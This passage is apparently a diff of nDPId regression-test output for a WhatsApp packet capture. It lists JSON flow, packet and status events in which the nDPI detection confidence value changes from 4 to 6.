{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":406,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":406,"packets-processed":405,"total-skipped-flows":0,"total-l4-payload-len":32915,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":51,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":51,"total-idle-flows":39,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":332,"global_ts_msec":1655075014427} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655075014427,"flow_last_seen":1655075014427,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655075014427,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42796,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1655075014427,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655075014427,"pkt":"eJS0JASgYDjgxTWgCABFAAA84Y1AAD8GIMTAqAJkszzDIacsFGb7al66AAAAAKAC\/\/87hQAAAgQFtAQCCAoGKrcsAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1655075014457,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655075014457,"pkt":"eJS0JASgYDjgxTWgCABFAAA04Y5AAD8GIMvAqAJkszzDIacsFGb7al674\/2+D4AQAKzv2QAAAQEICgYqt1ks76qT"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1655075014458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655075014458,"pkt":"eJS0JASgYDjgxTWgCABFAAA44Y9AAD8GIMbAqAJkszzDIacsFGb7al674\/2+D4AYAKyqhgAAAQEICgYqt1ss76qTRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655075014427,"flow_last_seen":1655075014459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655075014459,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42796,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":414,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655067574156,"flow_last_seen":1655067574418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655075014609,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45334,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655075014427,"flow_last_seen":1655075014459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655075014459,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42796,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":414,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655067574156,"flow_last_seen":1655067574418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655075014609,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45334,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":414,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":414,"packets-processed":413,"total-skipped-flows":0,"total-l4-payload-len":34188,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":52,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":52,"total-idle-flows":40,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":339,"global_ts_msec":1655075686356} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655075686356,"flow_last_seen":1655075686356,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655075686356,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":43152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1655075686356,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655075686356,"pkt":"eJS0JASgYDjgxTWgCABFAAA8QvtAAD8Gv1bAqAJkszzDIaiQFGbxmYdKAAAAAKAC\/\/\/ajwAAAgQFtAQCCAoGNPf0AAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1655075686389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655075686389,"pkt":"eJS0JASgYDjgxTWgCABFAAA0QvxAAD8Gv13AqAJkszzDIaiQFGbxmYdLWdXXDoAQAKw7swAAAQEICgY0+BVuVC2V"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1655075686390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655075686390,"pkt":"eJS0JASgYDjgxTWgCABFAAA4Qv1AAD8Gv1jAqAJkszzDIaiQFGbxmYdLWdXXDoAYAKz2XwAAAQEICgY0+BduVC2VRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655075686356,"flow_last_seen":1655075686391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655075686391,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":43152,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655068204945,"flow_last_seen":1655068205140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655075686549,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41664,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655068071917,"flow_last_seen":1655068072357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655075686549,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655075686356,"flow_last_seen":1655075686391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655075686391,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":43152,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655068204945,"flow_last_seen":1655068205140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655075686549,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41664,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655068071917,"flow_last_seen":1655068072357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655075686549,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":422,"packets-processed":421,"total-skipped-flows":0,"total-l4-payload-len":35461,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":53,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":53,"total-idle-flows":42,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":347,"global_ts_msec":1655078415178} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655078415178,"flow_last_seen":1655078415178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655078415178,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46732,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1655078415178,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655078415178,"pkt":"eJS0JASgYDjgxTWgCABFAAA8CblAAD8G+IjAqAJkszzDMbaMFGYZMLRzAAAAAKAC\/\/8IFAAAAgQFtAQCCArHDabLAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1655078415208,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655078415208,"pkt":"eJS0JASgYDjgxTWgCABFAAA0CbpAAD8G+I\/AqAJkszzDMbaMFGYZMLR0Md5NzYAQAKysVQAAAQEICscNpurDrEZZ"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1655078415272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655078415272,"pkt":"eJS0JASgYDjgxTWgCABFAAA4CbtAAD8G+IrAqAJkszzDMbaMFGYZMLR0Md5NzYAYAKxmxQAAAQEICscNpynDrEZZRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655078415178,"flow_last_seen":1655078415302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655078415302,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46732,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655078415178,"flow_last_seen":1655078415302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655078415302,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46732,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655078417966,"flow_last_seen":1655078417966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655078417966,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58882,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1655078417966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655078417966,"pkt":"eJS0JASgYDjgxTWgCABFAAA8aDVAAD8GmgzAqAJkszzDMeYCFGZBxg2JAAAAAKAC\/\/96TQAAAgQFtAQCCApIyAG3AAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1655078418007,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655078418007,"pkt":"eJS0JASgYDjgxTWgCABFAAA0aDZAAD8GmhPAqAJkszzDMeYCFGZBxg2KkGSxpoAQAVfcVQAAAQEICkjIAeVbmS2L"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1655078418014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655078418014,"pkt":"eJS0JASgYDjgxTWgCABFAAA4aDdAAD8Gmg7AqAJkszzDMeYCFGZBxg2KkGSxpoAYAVeW\/gAAAQEICkjIAetbmS2LRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655078417966,"flow_last_seen":1655078418062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655078418062,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58882,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655078417966,"flow_last_seen":1655078418062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655078418062,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58882,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655078418150,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46598,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655078418150,"pkt":"eJS0JASgYDjgxTWgCABFAAA86upAAD8GF1fAqAJkszzDMbYGFGbAe04zAAAAAKAC\/\/8ChgAAAgQFtAQCCAo4N\/qqAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655078418150,"pkt":"eJS0JASgYDjgxTWgCABFAAA06utAAD8GF17AqAJkszzDMbYGFGbAe040KCJ2LIAQAIB2bQAAAQEICjg3+s2LqpA6"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655078418150,"pkt":"eJS0JASgYDjgxTWgCABFAAA46uxAAD8GF1nAqAJkszzDMbYGFGbAe040KCJ2LIAYAIAxGAAAAQEICjg3+tGLqpA6RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655078418150,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46598,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655069476999,"flow_last_seen":1655069477452,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1269,"flow_tot_l4_payload_len":1317,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41722,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655068672605,"flow_last_seen":1655068672866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52294,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655078418150,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46598,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655069476999,"flow_last_seen":1655069477452,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1269,"flow_tot_l4_payload_len":1317,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41722,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655068672605,"flow_last_seen":1655068672866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52294,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":442,"packets-processed":441,"total-skipped-flows":0,"total-l4-payload-len":36355,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":56,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":56,"total-idle-flows":44,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":365,"global_ts_msec":1655079015860} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655079015860,"flow_last_seen":1655079015860,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655079015860,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46768,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 